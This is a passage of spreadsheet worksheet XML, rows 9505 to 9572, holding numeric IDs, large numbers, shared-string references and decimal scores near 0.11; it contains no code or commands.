        <v>1.0</v>
      </c>
      <c r="E9505" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F9505" s="2">
        <v>0.1120857699805068</v>
      </c>
    </row>
    <row r="9506" ht="15.75" customHeight="1">
      <c r="A9506" s="1">
        <v>16479.0</v>
      </c>
      <c r="B9506" s="2">
        <v>4.6510709E7</v>
      </c>
      <c r="C9506" s="2" t="s">
        <v>9077</v>
      </c>
      <c r="D9506" s="2">
        <v>1.0</v>
      </c>
      <c r="E9506" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F9506" s="2">
        <v>0.1120689655172414</v>
      </c>
    </row>
    <row r="9507" ht="15.75" customHeight="1">
      <c r="A9507" s="1">
        <v>19729.0</v>
      </c>
      <c r="B9507" s="2">
        <v>5.6624219E7</v>
      </c>
      <c r="C9507" s="2" t="s">
        <v>9078</v>
      </c>
      <c r="D9507" s="2">
        <v>1.0</v>
      </c>
      <c r="E9507" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F9507" s="2">
        <v>0.1120689655172414</v>
      </c>
    </row>
    <row r="9508" ht="15.75" customHeight="1">
      <c r="A9508" s="1">
        <v>24267.0</v>
      </c>
      <c r="B9508" s="2">
        <v>1.052486E7</v>
      </c>
      <c r="C9508" s="2" t="s">
        <v>9079</v>
      </c>
      <c r="D9508" s="2">
        <v>1.0</v>
      </c>
      <c r="E9508" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F9508" s="2">
        <v>0.1120689655172414</v>
      </c>
    </row>
    <row r="9509" ht="15.75" customHeight="1">
      <c r="A9509" s="1">
        <v>2491.0</v>
      </c>
      <c r="B9509" s="2">
        <v>3.3892087E7</v>
      </c>
      <c r="C9509" s="2" t="s">
        <v>9080</v>
      </c>
      <c r="D9509" s="2">
        <v>1.0</v>
      </c>
      <c r="E9509" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F9509" s="2">
        <v>0.1120689655172413</v>
      </c>
    </row>
    <row r="9510" ht="15.75" customHeight="1">
      <c r="A9510" s="1">
        <v>22517.0</v>
      </c>
      <c r="B9510" s="2">
        <v>3.7598103E7</v>
      </c>
      <c r="C9510" s="2" t="s">
        <v>9081</v>
      </c>
      <c r="D9510" s="2">
        <v>1.0</v>
      </c>
      <c r="E9510" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F9510" s="2">
        <v>0.1120689655172413</v>
      </c>
    </row>
    <row r="9511" ht="15.75" customHeight="1">
      <c r="A9511" s="1">
        <v>13621.0</v>
      </c>
      <c r="B9511" s="2">
        <v>3.5873656E7</v>
      </c>
      <c r="C9511" s="2" t="s">
        <v>9082</v>
      </c>
      <c r="D9511" s="2">
        <v>1.0</v>
      </c>
      <c r="E9511" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F9511" s="2">
        <v>0.1120527306967985</v>
      </c>
    </row>
    <row r="9512" ht="15.75" customHeight="1">
      <c r="A9512" s="1">
        <v>19346.0</v>
      </c>
      <c r="B9512" s="2">
        <v>5.5383074E7</v>
      </c>
      <c r="C9512" s="2" t="s">
        <v>9083</v>
      </c>
      <c r="D9512" s="2">
        <v>1.0</v>
      </c>
      <c r="E9512" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F9512" s="2">
        <v>0.1120527306967985</v>
      </c>
    </row>
    <row r="9513" ht="15.75" customHeight="1">
      <c r="A9513" s="1">
        <v>20573.0</v>
      </c>
      <c r="B9513" s="2">
        <v>1.3592788E7</v>
      </c>
      <c r="C9513" s="2" t="s">
        <v>9084</v>
      </c>
      <c r="D9513" s="2">
        <v>1.0</v>
      </c>
      <c r="E9513" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F9513" s="2">
        <v>0.1120527306967985</v>
      </c>
    </row>
    <row r="9514" ht="15.75" customHeight="1">
      <c r="A9514" s="1">
        <v>31238.0</v>
      </c>
      <c r="B9514" s="2">
        <v>4.9284375E7</v>
      </c>
      <c r="C9514" s="2" t="s">
        <v>9085</v>
      </c>
      <c r="D9514" s="2">
        <v>1.0</v>
      </c>
      <c r="E9514" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F9514" s="2">
        <v>0.1120527306967985</v>
      </c>
    </row>
    <row r="9515" ht="15.75" customHeight="1">
      <c r="A9515" s="1">
        <v>31494.0</v>
      </c>
      <c r="B9515" s="2">
        <v>5062934.0</v>
      </c>
      <c r="C9515" s="2" t="s">
        <v>9086</v>
      </c>
      <c r="D9515" s="2">
        <v>1.0</v>
      </c>
      <c r="E9515" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F9515" s="2">
        <v>0.1120218579234973</v>
      </c>
    </row>
    <row r="9516" ht="15.75" customHeight="1">
      <c r="A9516" s="1">
        <v>31962.0</v>
      </c>
      <c r="B9516" s="2">
        <v>5310914.0</v>
      </c>
      <c r="C9516" s="2" t="s">
        <v>9087</v>
      </c>
      <c r="D9516" s="2">
        <v>1.0</v>
      </c>
      <c r="E9516" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F9516" s="2">
        <v>0.1120218579234972</v>
      </c>
    </row>
    <row r="9517" ht="15.75" customHeight="1">
      <c r="A9517" s="1">
        <v>12414.0</v>
      </c>
      <c r="B9517" s="2">
        <v>2.9115458E7</v>
      </c>
      <c r="C9517" s="2" t="s">
        <v>9088</v>
      </c>
      <c r="D9517" s="2">
        <v>1.0</v>
      </c>
      <c r="E9517" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F9517" s="2">
        <v>0.1120071684587814</v>
      </c>
    </row>
    <row r="9518" ht="15.75" customHeight="1">
      <c r="A9518" s="1">
        <v>13277.0</v>
      </c>
      <c r="B9518" s="2">
        <v>3.4392058E7</v>
      </c>
      <c r="C9518" s="2" t="s">
        <v>9089</v>
      </c>
      <c r="D9518" s="2">
        <v>1.0</v>
      </c>
      <c r="E9518" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F9518" s="2">
        <v>0.1119929453262787</v>
      </c>
    </row>
    <row r="9519" ht="15.75" customHeight="1">
      <c r="A9519" s="1">
        <v>228.0</v>
      </c>
      <c r="B9519" s="2">
        <v>1.4739189E7</v>
      </c>
      <c r="C9519" s="2" t="s">
        <v>9090</v>
      </c>
      <c r="D9519" s="2">
        <v>1.0</v>
      </c>
      <c r="E9519" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F9519" s="2">
        <v>0.1119791666666667</v>
      </c>
    </row>
    <row r="9520" ht="15.75" customHeight="1">
      <c r="A9520" s="1">
        <v>401.0</v>
      </c>
      <c r="B9520" s="2">
        <v>1.6670142E7</v>
      </c>
      <c r="C9520" s="2" t="s">
        <v>9091</v>
      </c>
      <c r="D9520" s="2">
        <v>1.0</v>
      </c>
      <c r="E9520" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F9520" s="2">
        <v>0.1102564102564103</v>
      </c>
    </row>
    <row r="9521" ht="15.75" customHeight="1">
      <c r="A9521" s="1">
        <v>4764.0</v>
      </c>
      <c r="B9521" s="2">
        <v>4.3430508E7</v>
      </c>
      <c r="C9521" s="2" t="s">
        <v>9092</v>
      </c>
      <c r="D9521" s="2">
        <v>1.0</v>
      </c>
      <c r="E9521" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F9521" s="2">
        <v>0.1102564102564103</v>
      </c>
    </row>
    <row r="9522" ht="15.75" customHeight="1">
      <c r="A9522" s="1">
        <v>14465.0</v>
      </c>
      <c r="B9522" s="2">
        <v>3.9483201E7</v>
      </c>
      <c r="C9522" s="2" t="s">
        <v>9093</v>
      </c>
      <c r="D9522" s="2">
        <v>1.0</v>
      </c>
      <c r="E9522" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F9522" s="2">
        <v>0.1102564102564103</v>
      </c>
    </row>
    <row r="9523" ht="15.75" customHeight="1">
      <c r="A9523" s="1">
        <v>15819.0</v>
      </c>
      <c r="B9523" s="2">
        <v>4.4267395E7</v>
      </c>
      <c r="C9523" s="2" t="s">
        <v>9094</v>
      </c>
      <c r="D9523" s="2">
        <v>1.0</v>
      </c>
      <c r="E9523" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F9523" s="2">
        <v>0.1102564102564103</v>
      </c>
    </row>
    <row r="9524" ht="15.75" customHeight="1">
      <c r="A9524" s="1">
        <v>21305.0</v>
      </c>
      <c r="B9524" s="2">
        <v>2.075237E7</v>
      </c>
      <c r="C9524" s="2" t="s">
        <v>9095</v>
      </c>
      <c r="D9524" s="2">
        <v>1.0</v>
      </c>
      <c r="E9524" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F9524" s="2">
        <v>0.1102564102564103</v>
      </c>
    </row>
    <row r="9525" ht="15.75" customHeight="1">
      <c r="A9525" s="1">
        <v>27134.0</v>
      </c>
      <c r="B9525" s="2">
        <v>2.0752369E7</v>
      </c>
      <c r="C9525" s="2" t="s">
        <v>9095</v>
      </c>
      <c r="D9525" s="2">
        <v>1.0</v>
      </c>
      <c r="E9525" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F9525" s="2">
        <v>0.1102564102564103</v>
      </c>
    </row>
    <row r="9526" ht="15.75" customHeight="1">
      <c r="A9526" s="1">
        <v>32973.0</v>
      </c>
      <c r="B9526" s="2">
        <v>6550675.0</v>
      </c>
      <c r="C9526" s="2" t="s">
        <v>9096</v>
      </c>
      <c r="D9526" s="2">
        <v>1.0</v>
      </c>
      <c r="E9526" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F9526" s="2">
        <v>0.1102003642987249</v>
      </c>
    </row>
    <row r="9527" ht="15.75" customHeight="1">
      <c r="A9527" s="1">
        <v>12041.0</v>
      </c>
      <c r="B9527" s="2">
        <v>2.6319113E7</v>
      </c>
      <c r="C9527" s="2" t="s">
        <v>9097</v>
      </c>
      <c r="D9527" s="2">
        <v>1.0</v>
      </c>
      <c r="E9527" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F9527" s="2">
        <v>0.1101851851851852</v>
      </c>
    </row>
    <row r="9528" ht="15.75" customHeight="1">
      <c r="A9528" s="1">
        <v>13751.0</v>
      </c>
      <c r="B9528" s="2">
        <v>3.6486449E7</v>
      </c>
      <c r="C9528" s="2" t="s">
        <v>9098</v>
      </c>
      <c r="D9528" s="2">
        <v>1.0</v>
      </c>
      <c r="E9528" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F9528" s="2">
        <v>0.1101851851851852</v>
      </c>
    </row>
    <row r="9529" ht="15.75" customHeight="1">
      <c r="A9529" s="1">
        <v>18579.0</v>
      </c>
      <c r="B9529" s="2">
        <v>5.3243216E7</v>
      </c>
      <c r="C9529" s="2" t="s">
        <v>9099</v>
      </c>
      <c r="D9529" s="2">
        <v>1.0</v>
      </c>
      <c r="E9529" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F9529" s="2">
        <v>0.1101851851851852</v>
      </c>
    </row>
    <row r="9530" ht="15.75" customHeight="1">
      <c r="A9530" s="1">
        <v>32560.0</v>
      </c>
      <c r="B9530" s="2">
        <v>5768236.0</v>
      </c>
      <c r="C9530" s="2" t="s">
        <v>9100</v>
      </c>
      <c r="D9530" s="2">
        <v>1.0</v>
      </c>
      <c r="E9530" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F9530" s="2">
        <v>0.1101851851851852</v>
      </c>
    </row>
    <row r="9531" ht="15.75" customHeight="1">
      <c r="A9531" s="1">
        <v>33885.0</v>
      </c>
      <c r="B9531" s="2">
        <v>9131108.0</v>
      </c>
      <c r="C9531" s="2" t="s">
        <v>9101</v>
      </c>
      <c r="D9531" s="2">
        <v>1.0</v>
      </c>
      <c r="E9531" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F9531" s="2">
        <v>0.1101851851851852</v>
      </c>
    </row>
    <row r="9532" ht="15.75" customHeight="1">
      <c r="A9532" s="1">
        <v>1056.0</v>
      </c>
      <c r="B9532" s="2">
        <v>2.3446584E7</v>
      </c>
      <c r="C9532" s="2" t="s">
        <v>9102</v>
      </c>
      <c r="D9532" s="2">
        <v>1.0</v>
      </c>
      <c r="E9532" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F9532" s="2">
        <v>0.1101694915254237</v>
      </c>
    </row>
    <row r="9533" ht="15.75" customHeight="1">
      <c r="A9533" s="1">
        <v>9218.0</v>
      </c>
      <c r="B9533" s="2">
        <v>5.5429238E7</v>
      </c>
      <c r="C9533" s="2" t="s">
        <v>9103</v>
      </c>
      <c r="D9533" s="2">
        <v>1.0</v>
      </c>
      <c r="E9533" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F9533" s="2">
        <v>0.1101694915254237</v>
      </c>
    </row>
    <row r="9534" ht="15.75" customHeight="1">
      <c r="A9534" s="1">
        <v>9244.0</v>
      </c>
      <c r="B9534" s="2">
        <v>5.5467853E7</v>
      </c>
      <c r="C9534" s="2" t="s">
        <v>9104</v>
      </c>
      <c r="D9534" s="2">
        <v>1.0</v>
      </c>
      <c r="E9534" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F9534" s="2">
        <v>0.1101694915254237</v>
      </c>
    </row>
    <row r="9535" ht="15.75" customHeight="1">
      <c r="A9535" s="1">
        <v>10829.0</v>
      </c>
      <c r="B9535" s="2">
        <v>1.598581E7</v>
      </c>
      <c r="C9535" s="2" t="s">
        <v>9105</v>
      </c>
      <c r="D9535" s="2">
        <v>1.0</v>
      </c>
      <c r="E9535" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F9535" s="2">
        <v>0.1101694915254237</v>
      </c>
    </row>
    <row r="9536" ht="15.75" customHeight="1">
      <c r="A9536" s="1">
        <v>21211.0</v>
      </c>
      <c r="B9536" s="2">
        <v>1.9577508E7</v>
      </c>
      <c r="C9536" s="2" t="s">
        <v>9106</v>
      </c>
      <c r="D9536" s="2">
        <v>1.0</v>
      </c>
      <c r="E9536" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F9536" s="2">
        <v>0.1101694915254237</v>
      </c>
    </row>
    <row r="9537" ht="15.75" customHeight="1">
      <c r="A9537" s="1">
        <v>33383.0</v>
      </c>
      <c r="B9537" s="2">
        <v>7652284.0</v>
      </c>
      <c r="C9537" s="2" t="s">
        <v>9107</v>
      </c>
      <c r="D9537" s="2">
        <v>1.0</v>
      </c>
      <c r="E9537" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F9537" s="2">
        <v>0.1101694915254237</v>
      </c>
    </row>
    <row r="9538" ht="15.75" customHeight="1">
      <c r="A9538" s="1">
        <v>516.0</v>
      </c>
      <c r="B9538" s="2">
        <v>1.8197252E7</v>
      </c>
      <c r="C9538" s="2" t="s">
        <v>9108</v>
      </c>
      <c r="D9538" s="2">
        <v>1.0</v>
      </c>
      <c r="E9538" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F9538" s="2">
        <v>0.1101532567049808</v>
      </c>
    </row>
    <row r="9539" ht="15.75" customHeight="1">
      <c r="A9539" s="1">
        <v>2796.0</v>
      </c>
      <c r="B9539" s="2">
        <v>3.5262848E7</v>
      </c>
      <c r="C9539" s="2" t="s">
        <v>9109</v>
      </c>
      <c r="D9539" s="2">
        <v>1.0</v>
      </c>
      <c r="E9539" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F9539" s="2">
        <v>0.1101532567049808</v>
      </c>
    </row>
    <row r="9540" ht="15.75" customHeight="1">
      <c r="A9540" s="1">
        <v>10646.0</v>
      </c>
      <c r="B9540" s="2">
        <v>1.4148418E7</v>
      </c>
      <c r="C9540" s="2" t="s">
        <v>9110</v>
      </c>
      <c r="D9540" s="2">
        <v>1.0</v>
      </c>
      <c r="E9540" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F9540" s="2">
        <v>0.1101532567049808</v>
      </c>
    </row>
    <row r="9541" ht="15.75" customHeight="1">
      <c r="A9541" s="1">
        <v>25654.0</v>
      </c>
      <c r="B9541" s="2">
        <v>1.4523175E7</v>
      </c>
      <c r="C9541" s="2" t="s">
        <v>9111</v>
      </c>
      <c r="D9541" s="2">
        <v>1.0</v>
      </c>
      <c r="E9541" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F9541" s="2">
        <v>0.1101532567049808</v>
      </c>
    </row>
    <row r="9542" ht="15.75" customHeight="1">
      <c r="A9542" s="1">
        <v>30699.0</v>
      </c>
      <c r="B9542" s="2">
        <v>4254876.0</v>
      </c>
      <c r="C9542" s="2" t="s">
        <v>9112</v>
      </c>
      <c r="D9542" s="2">
        <v>1.0</v>
      </c>
      <c r="E9542" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F9542" s="2">
        <v>0.1101532567049808</v>
      </c>
    </row>
    <row r="9543" ht="15.75" customHeight="1">
      <c r="A9543" s="1">
        <v>6536.0</v>
      </c>
      <c r="B9543" s="2">
        <v>4.88529E7</v>
      </c>
      <c r="C9543" s="2" t="s">
        <v>9113</v>
      </c>
      <c r="D9543" s="2">
        <v>1.0</v>
      </c>
      <c r="E9543" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F9543" s="2">
        <v>0.1101364522417154</v>
      </c>
    </row>
    <row r="9544" ht="15.75" customHeight="1">
      <c r="A9544" s="1">
        <v>8139.0</v>
      </c>
      <c r="B9544" s="2">
        <v>5.3138067E7</v>
      </c>
      <c r="C9544" s="2" t="s">
        <v>9114</v>
      </c>
      <c r="D9544" s="2">
        <v>1.0</v>
      </c>
      <c r="E9544" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F9544" s="2">
        <v>0.1101364522417154</v>
      </c>
    </row>
    <row r="9545" ht="15.75" customHeight="1">
      <c r="A9545" s="1">
        <v>8670.0</v>
      </c>
      <c r="B9545" s="2">
        <v>5.4373584E7</v>
      </c>
      <c r="C9545" s="2" t="s">
        <v>9115</v>
      </c>
      <c r="D9545" s="2">
        <v>1.0</v>
      </c>
      <c r="E9545" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F9545" s="2">
        <v>0.1101364522417154</v>
      </c>
    </row>
    <row r="9546" ht="15.75" customHeight="1">
      <c r="A9546" s="1">
        <v>8689.0</v>
      </c>
      <c r="B9546" s="2">
        <v>5.4409639E7</v>
      </c>
      <c r="C9546" s="2" t="s">
        <v>9116</v>
      </c>
      <c r="D9546" s="2">
        <v>1.0</v>
      </c>
      <c r="E9546" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F9546" s="2">
        <v>0.1101364522417154</v>
      </c>
    </row>
    <row r="9547" ht="15.75" customHeight="1">
      <c r="A9547" s="1">
        <v>11960.0</v>
      </c>
      <c r="B9547" s="2">
        <v>2.5595819E7</v>
      </c>
      <c r="C9547" s="2" t="s">
        <v>9117</v>
      </c>
      <c r="D9547" s="2">
        <v>1.0</v>
      </c>
      <c r="E9547" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F9547" s="2">
        <v>0.1101364522417154</v>
      </c>
    </row>
    <row r="9548" ht="15.75" customHeight="1">
      <c r="A9548" s="1">
        <v>19257.0</v>
      </c>
      <c r="B9548" s="2">
        <v>5.5124866E7</v>
      </c>
      <c r="C9548" s="2" t="s">
        <v>9118</v>
      </c>
      <c r="D9548" s="2">
        <v>1.0</v>
      </c>
      <c r="E9548" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F9548" s="2">
        <v>0.1101364522417154</v>
      </c>
    </row>
    <row r="9549" ht="15.75" customHeight="1">
      <c r="A9549" s="1">
        <v>33518.0</v>
      </c>
      <c r="B9549" s="2">
        <v>8093698.0</v>
      </c>
      <c r="C9549" s="2" t="s">
        <v>9119</v>
      </c>
      <c r="D9549" s="2">
        <v>1.0</v>
      </c>
      <c r="E9549" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F9549" s="2">
        <v>0.1101364522417154</v>
      </c>
    </row>
    <row r="9550" ht="15.75" customHeight="1">
      <c r="A9550" s="1">
        <v>174.0</v>
      </c>
      <c r="B9550" s="2">
        <v>1.3967942E7</v>
      </c>
      <c r="C9550" s="2" t="s">
        <v>9120</v>
      </c>
      <c r="D9550" s="2">
        <v>1.0</v>
      </c>
      <c r="E9550" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F9550" s="2">
        <v>0.1101190476190476</v>
      </c>
    </row>
    <row r="9551" ht="15.75" customHeight="1">
      <c r="A9551" s="1">
        <v>242.0</v>
      </c>
      <c r="B9551" s="2">
        <v>1.4913809E7</v>
      </c>
      <c r="C9551" s="2" t="s">
        <v>9121</v>
      </c>
      <c r="D9551" s="2">
        <v>1.0</v>
      </c>
      <c r="E9551" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F9551" s="2">
        <v>0.1101190476190476</v>
      </c>
    </row>
    <row r="9552" ht="15.75" customHeight="1">
      <c r="A9552" s="1">
        <v>408.0</v>
      </c>
      <c r="B9552" s="2">
        <v>1.6697115E7</v>
      </c>
      <c r="C9552" s="2" t="s">
        <v>9122</v>
      </c>
      <c r="D9552" s="2">
        <v>1.0</v>
      </c>
      <c r="E9552" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F9552" s="2">
        <v>0.1101190476190476</v>
      </c>
    </row>
    <row r="9553" ht="15.75" customHeight="1">
      <c r="A9553" s="1">
        <v>586.0</v>
      </c>
      <c r="B9553" s="2">
        <v>1.9139014E7</v>
      </c>
      <c r="C9553" s="2" t="s">
        <v>9123</v>
      </c>
      <c r="D9553" s="2">
        <v>1.0</v>
      </c>
      <c r="E9553" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F9553" s="2">
        <v>0.1101190476190476</v>
      </c>
    </row>
    <row r="9554" ht="15.75" customHeight="1">
      <c r="A9554" s="1">
        <v>709.0</v>
      </c>
      <c r="B9554" s="2">
        <v>2.0612975E7</v>
      </c>
      <c r="C9554" s="2" t="s">
        <v>9124</v>
      </c>
      <c r="D9554" s="2">
        <v>1.0</v>
      </c>
      <c r="E9554" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F9554" s="2">
        <v>0.1101190476190476</v>
      </c>
    </row>
    <row r="9555" ht="15.75" customHeight="1">
      <c r="A9555" s="1">
        <v>863.0</v>
      </c>
      <c r="B9555" s="2">
        <v>2.1810682E7</v>
      </c>
      <c r="C9555" s="2" t="s">
        <v>9125</v>
      </c>
      <c r="D9555" s="2">
        <v>1.0</v>
      </c>
      <c r="E9555" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F9555" s="2">
        <v>0.1101190476190476</v>
      </c>
    </row>
    <row r="9556" ht="15.75" customHeight="1">
      <c r="A9556" s="1">
        <v>1004.0</v>
      </c>
      <c r="B9556" s="2">
        <v>2.303806E7</v>
      </c>
      <c r="C9556" s="2" t="s">
        <v>9126</v>
      </c>
      <c r="D9556" s="2">
        <v>1.0</v>
      </c>
      <c r="E9556" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F9556" s="2">
        <v>0.1101190476190476</v>
      </c>
    </row>
    <row r="9557" ht="15.75" customHeight="1">
      <c r="A9557" s="1">
        <v>1010.0</v>
      </c>
      <c r="B9557" s="2">
        <v>2.3074624E7</v>
      </c>
      <c r="C9557" s="2" t="s">
        <v>9127</v>
      </c>
      <c r="D9557" s="2">
        <v>1.0</v>
      </c>
      <c r="E9557" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F9557" s="2">
        <v>0.1101190476190476</v>
      </c>
    </row>
    <row r="9558" ht="15.75" customHeight="1">
      <c r="A9558" s="1">
        <v>1089.0</v>
      </c>
      <c r="B9558" s="2">
        <v>2.3767814E7</v>
      </c>
      <c r="C9558" s="2" t="s">
        <v>9128</v>
      </c>
      <c r="D9558" s="2">
        <v>1.0</v>
      </c>
      <c r="E9558" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F9558" s="2">
        <v>0.1101190476190476</v>
      </c>
    </row>
    <row r="9559" ht="15.75" customHeight="1">
      <c r="A9559" s="1">
        <v>1164.0</v>
      </c>
      <c r="B9559" s="2">
        <v>2.4519855E7</v>
      </c>
      <c r="C9559" s="2" t="s">
        <v>9129</v>
      </c>
      <c r="D9559" s="2">
        <v>1.0</v>
      </c>
      <c r="E9559" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F9559" s="2">
        <v>0.1101190476190476</v>
      </c>
    </row>
    <row r="9560" ht="15.75" customHeight="1">
      <c r="A9560" s="1">
        <v>1659.0</v>
      </c>
      <c r="B9560" s="2">
        <v>2.8161719E7</v>
      </c>
      <c r="C9560" s="2" t="s">
        <v>9130</v>
      </c>
      <c r="D9560" s="2">
        <v>1.0</v>
      </c>
      <c r="E9560" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F9560" s="2">
        <v>0.1101190476190476</v>
      </c>
    </row>
    <row r="9561" ht="15.75" customHeight="1">
      <c r="A9561" s="1">
        <v>1878.0</v>
      </c>
      <c r="B9561" s="2">
        <v>2.9683005E7</v>
      </c>
      <c r="C9561" s="2" t="s">
        <v>9131</v>
      </c>
      <c r="D9561" s="2">
        <v>1.0</v>
      </c>
      <c r="E9561" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F9561" s="2">
        <v>0.1101190476190476</v>
      </c>
    </row>
    <row r="9562" ht="15.75" customHeight="1">
      <c r="A9562" s="1">
        <v>1924.0</v>
      </c>
      <c r="B9562" s="2">
        <v>3.0091016E7</v>
      </c>
      <c r="C9562" s="2" t="s">
        <v>9132</v>
      </c>
      <c r="D9562" s="2">
        <v>1.0</v>
      </c>
      <c r="E9562" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F9562" s="2">
        <v>0.1101190476190476</v>
      </c>
    </row>
    <row r="9563" ht="15.75" customHeight="1">
      <c r="A9563" s="1">
        <v>2206.0</v>
      </c>
      <c r="B9563" s="2">
        <v>3.2073931E7</v>
      </c>
      <c r="C9563" s="2" t="s">
        <v>9133</v>
      </c>
      <c r="D9563" s="2">
        <v>1.0</v>
      </c>
      <c r="E9563" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F9563" s="2">
        <v>0.1101190476190476</v>
      </c>
    </row>
    <row r="9564" ht="15.75" customHeight="1">
      <c r="A9564" s="1">
        <v>2540.0</v>
      </c>
      <c r="B9564" s="2">
        <v>3.4110061E7</v>
      </c>
      <c r="C9564" s="2" t="s">
        <v>9134</v>
      </c>
      <c r="D9564" s="2">
        <v>1.0</v>
      </c>
      <c r="E9564" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F9564" s="2">
        <v>0.1101190476190476</v>
      </c>
    </row>
    <row r="9565" ht="15.75" customHeight="1">
      <c r="A9565" s="1">
        <v>2548.0</v>
      </c>
      <c r="B9565" s="2">
        <v>3.4130536E7</v>
      </c>
      <c r="C9565" s="2" t="s">
        <v>9135</v>
      </c>
      <c r="D9565" s="2">
        <v>1.0</v>
      </c>
      <c r="E9565" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F9565" s="2">
        <v>0.1101190476190476</v>
      </c>
    </row>
    <row r="9566" ht="15.75" customHeight="1">
      <c r="A9566" s="1">
        <v>2587.0</v>
      </c>
      <c r="B9566" s="2">
        <v>3.4327323E7</v>
      </c>
      <c r="C9566" s="2" t="s">
        <v>9136</v>
      </c>
      <c r="D9566" s="2">
        <v>1.0</v>
      </c>
      <c r="E9566" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F9566" s="2">
        <v>0.1101190476190476</v>
      </c>
    </row>
    <row r="9567" ht="15.75" customHeight="1">
      <c r="A9567" s="1">
        <v>2651.0</v>
      </c>
      <c r="B9567" s="2">
        <v>3.4673175E7</v>
      </c>
      <c r="C9567" s="2" t="s">
        <v>9137</v>
      </c>
      <c r="D9567" s="2">
        <v>1.0</v>
      </c>
      <c r="E9567" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F9567" s="2">
        <v>0.1101190476190476</v>
      </c>
    </row>
    <row r="9568" ht="15.75" customHeight="1">
      <c r="A9568" s="1">
        <v>3062.0</v>
      </c>
      <c r="B9568" s="2">
        <v>3.6509694E7</v>
      </c>
      <c r="C9568" s="2" t="s">
        <v>9138</v>
      </c>
      <c r="D9568" s="2">
        <v>1.0</v>
      </c>
      <c r="E9568" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F9568" s="2">
        <v>0.1101190476190476</v>
      </c>
    </row>
    <row r="9569" ht="15.75" customHeight="1">
      <c r="A9569" s="1">
        <v>3097.0</v>
      </c>
      <c r="B9569" s="2">
        <v>3.6699831E7</v>
      </c>
      <c r="C9569" s="2" t="s">
        <v>9139</v>
      </c>
      <c r="D9569" s="2">
        <v>1.0</v>
      </c>
      <c r="E9569" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F9569" s="2">
        <v>0.1101190476190476</v>
      </c>
    </row>
    <row r="9570" ht="15.75" customHeight="1">
      <c r="A9570" s="1">
        <v>3320.0</v>
      </c>
      <c r="B9570" s="2">
        <v>3.7646174E7</v>
      </c>
      <c r="C9570" s="2" t="s">
        <v>9140</v>
      </c>
      <c r="D9570" s="2">
        <v>1.0</v>
      </c>
      <c r="E9570" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F9570" s="2">
        <v>0.1101190476190476</v>
      </c>
    </row>
    <row r="9571" ht="15.75" customHeight="1">
      <c r="A9571" s="1">
        <v>3382.0</v>
      </c>
      <c r="B9571" s="2">
        <v>3.794238E7</v>
      </c>
      <c r="C9571" s="2" t="s">
        <v>9141</v>
      </c>
      <c r="D9571" s="2">
        <v>1.0</v>
      </c>
      <c r="E9571" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F9571" s="2">
        <v>0.1101190476190476</v>
      </c>
    </row>
    <row r="9572" ht="15.75" customHeight="1">
      <c r="A9572" s="1">
        <v>3464.0</v>
      </c>
      <c r="B9572" s="2">
        <v>3.8335994E7</v>
      </c>
      <c r="C9572" s="2" t="s">
        <v>9142</v>
      </c>
      <c r="D9572" s="2">
        <v>1.0</v>
      </c>
